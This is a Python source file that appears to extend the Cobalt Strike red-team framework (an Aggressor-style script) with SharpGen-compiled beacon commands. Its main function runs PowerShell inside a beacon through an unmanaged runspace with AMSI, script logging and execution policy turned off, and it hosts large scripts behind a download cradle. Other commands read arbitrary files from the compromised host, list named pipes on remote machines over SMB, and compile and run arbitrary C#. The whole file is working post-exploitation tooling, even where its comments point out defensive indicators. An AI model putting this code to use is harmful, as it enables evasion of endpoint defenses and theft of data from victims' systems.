def custom_powerpick(bid, command, silent=False, auto_host=True):
    """Execute a PowerShell script in beacon *bid* through an unmanaged runspace.

    The script text is shipped as the args array of a small C# program that
    SharpGen compiles. That program re-joins the lines and hands them to
    ``Execution.PowerShell.RunAsync`` (not defined in this file; presumably a
    SharpSploit-style wrapper) with PowerShell logging, AMSI and the execution
    policy all disabled, then writes each result to stdout, which comes back
    as beacon output. Defensively this is the classic "unmanaged PowerShell"
    pattern: System.Management.Automation loaded into a non-PowerShell
    process, with no script-block logging.

    Args:
        bid: Beacon ID to task.
        command: PowerShell source. A script imported earlier with
            ``powershell-import``/``bpowershell_import`` is prepended so the
            command can call its functions.
        silent: Suppress the "Tasked beacon to run" console line.
        auto_host: If the assembled script is longer than the module-level
            ``max_script_size``, host it on the team server and run the
            returned download cradle instead of passing the full text.

    Uses the module-level names ``max_script_size`` and ``sharpgen_cache``.
    """
    runner = helpers.code_string(r"""
        string powershell = String.Join("\n", args);
        var results = Execution.PowerShell.RunAsync(powershell, disableLogging: true, disableAmsi: true, bypassExecutionPolicy: true);
        foreach (string result in results)
        {
            Console.Write(result);
        }
        """)

    if not silent:
        # Report the operator's original command (before any cradle is
        # prepended), flattened onto one line.
        one_line = ' '.join(command.split('\n'))
        aggressor.btask(bid, 'Tasked beacon to run: {} (custom unmanaged)'.format(one_line))

    # Prepend the cradle for a previously imported script, if there is one.
    imported = aggressor.beacon_host_imported_script(bid)
    if imported:
        command = '\n'.join((imported, command))

    # Oversized scripts are hosted and replaced by a download cradle.
    if auto_host and len(command) > max_script_size:
        command = aggressor.beacon_host_script(bid, command)

    # Echoes the final script (or cradle) to the script console. This looks
    # like a debug leftover -- TODO(review): confirm it is wanted, since it
    # copies the full script text into the console log.
    engine.message(command)

    assemblies = [
        'mscorlib.dll',
        'System.dll',
        'System.Core.dll',
        'System.Management.Automation.dll',
    ]
    # One args entry per script line, with a leading empty entry; the C#
    # side re-joins them with "\n", so this only adds a leading newline.
    script_args = command.split('\n')
    script_args.insert(0, '')
    sharpgen.execute(bid, runner, script_args, references=assemblies, resources=[], cache=sharpgen_cache)
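def _(bid, code, *args):
    """Compile *code* with SharpGen and execute it in beacon *bid*.

    Any extra positional arguments are forwarded to the compiled program as
    its ``args`` array. A RuntimeError from the compile step is reported to
    the beacon console instead of propagating.
    """
    aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code))
    try:
        # Pass the extra arguments as a single sequence, as every other
        # sharpgen.execute call in this file does. The original spread them
        # with *args, which would place the second user argument into
        # whatever positional parameter follows the args sequence.
        sharpgen.execute(bid, code, args)
    except RuntimeError:
        aggressor.berror(bid, 'SharpGen failed. See script console for more details')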
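def _(bid, fname, lines=10):
    """Print the first *lines* lines of *fname* from the beacon's host.

    The read happens inside the beacon: a SharpGen-compiled program opens the
    file with ``File.ReadLines``, takes ``lines`` entries (``Take`` needs
    System.Linq, presumably supplied by the SharpGen template) and writes
    them joined with CRLF. ``lines`` arrives as args[1] and is parsed with
    ``Int32.Parse`` there, so an int or a numeric string both work.
    """
    code = helpers.code_string(r"""
        string file = args[0];
        int lines = Int32.Parse(args[1]);
        string text = string.Join("\r\n", System.IO.File.ReadLines(file).Take(lines));
        System.Console.WriteLine(text);
        """)
    # btask takes the beacon id first; the original call omitted it, so the
    # message was passed as the bid and the task line was never logged.
    aggressor.btask(bid, 'Tasked beacon to get first {} lines of {}'.format(lines, fname))
    sharpgen.execute(bid, code, (fname, lines))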
def _(bid, *files):
    """Print the full contents of one or more files from the beacon host.

    Each path is read with ``File.ReadAllText`` inside the beacon and written
    to stdout in argument order with no separator between files. With no
    paths the beacon is not tasked and an error is shown instead.
    """
    if not files:
        aggressor.berror(bid, 'cat: specify some files to cat')
        return

    reader = helpers.code_string(r"""
        foreach (string file in args)
        {
            var text = System.IO.File.ReadAllText(file);
            System.Console.Write(text);
        }
        """)

    listing = ', '.join(files)
    aggressor.btask(bid, 'Tasked beacon to get contents of: {}'.format(listing))
    sharpgen.execute(bid, reader, files)
def _(bid, *args):
    """Echo every argument back through a SharpGen-compiled program.

    Smoke test for the SharpGen pipeline: the program prints each element of
    its args array prefixed with ``> ``. The echo code itself uses neither
    System.Management.Automation nor SharpSploit; the extra references and
    the cache/delete_after/silent options appear to be here to exercise
    those ``sharpgen.execute`` parameters -- TODO(review): confirm.
    """
    echo = helpers.code_string("""
        foreach (string arg in args)
        {
            Console.WriteLine("> " + arg);
        }
        """)

    extra_refs = ['System.Management.Automation.dll', 'SharpSploit.dll']
    sharpgen.execute(
        bid,
        echo,
        args,
        add_references=extra_refs,
        cache=True,
        delete_after=False,
        silent=False,
    )
def _(bid, code, *args):
    """Compile *code* with SharpGen, run it in beacon *bid*, report cache hits.

    Extra positional arguments become the program's args array.
    ``sharpgen.execute`` returns a truthy value when the build was served
    from the compilation cache, which is noted in the beacon console. A
    RuntimeError from the compile step becomes a beacon error message.

    NOTE(review): ``cache`` is neither a parameter nor a local here; this
    only works if a module-level ``cache`` exists -- confirm at file top.
    """
    aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code))
    try:
        cached = sharpgen.execute(bid, code, args, cache=cache)
        if cached:
            aggressor.blog2(bid, 'Build was retrieved from the cache')
    except RuntimeError:
        aggressor.berror(bid, 'SharpGen failed. See Script Console for more details.')
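def _(bid, *hosts):
    """List named pipes on one or more hosts from inside the beacon.

    Defaults to the local machine (``.``). For each host the compiled program
    enumerates ``\\\\<host>\\pipe`` with ``Directory.GetFiles`` and prints one
    pipe path per line. For a remote host this makes the beacon host open an
    SMB session to that machine, which is a network indicator worth knowing.

    ``resources/pipes.txt`` (``name<TAB>description`` per line) is loaded into
    ``pipes`` but is not used by the beacon-side code or the output --
    presumably intended to annotate well-known pipes. The load is kept, but
    the file is now closed deterministically and blank/tab-less lines are
    skipped instead of raising ValueError.
    """
    if not hosts:
        hosts = ('.',)

    # Known-pipe descriptions keyed by lower-cased pipe name.
    pipes = {}
    with open(utils.basedir('resources/pipes.txt')) as fh:
        for line in fh:
            name, sep, description = line.rstrip('\n').partition('\t')
            if not sep:
                continue  # blank or malformed line (e.g. trailing newline)
            pipes[name.lower()] = description

    code = helpers.code_string(r"""
        foreach (string host in args)
        {
            string path = $@"\\{host}\pipe";
            foreach (string pipe in System.IO.Directory.GetFiles(path))
            {
                Console.WriteLine(pipe);
            }
        }
        """)

    aggressor.btask(bid, 'Tasked beacon to list pipes on {}'.format(', '.join(hosts)))
    sharpgen.execute(bid, code, hosts)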